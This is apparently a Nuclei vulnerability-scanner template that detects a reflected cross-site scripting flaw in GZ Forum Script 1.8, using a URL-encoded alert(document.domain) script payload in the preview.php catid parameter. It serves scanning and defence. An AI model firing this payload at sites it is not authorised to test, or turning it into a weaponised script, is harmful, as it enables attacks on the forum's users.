id: gz-forum-script-xss

info:
  name: GZ Forum Script 1.8 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.
  reference:
    - https://www.exploit-db.com/exploits/51559
    - https://gzscripts.com/gz-forum-script.html
  metadata:
    verified: true
    max-request: 1
  tags: gzforum,xss,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "New Topic")'
          - 'contains(content_type, "text/html")'
        condition: and

# digest: 4a0a004730450221009c6ff6f5b059c822eaf5fc7399b0fcfc8b4b8ab99bdf3d5541bcbac5591ccaca022066329ee7e27e760f069414e1cd4d583f8bb56bfa9981f1a24fd31f24421711a9:922c64590222798bb761d5b6d8e72950
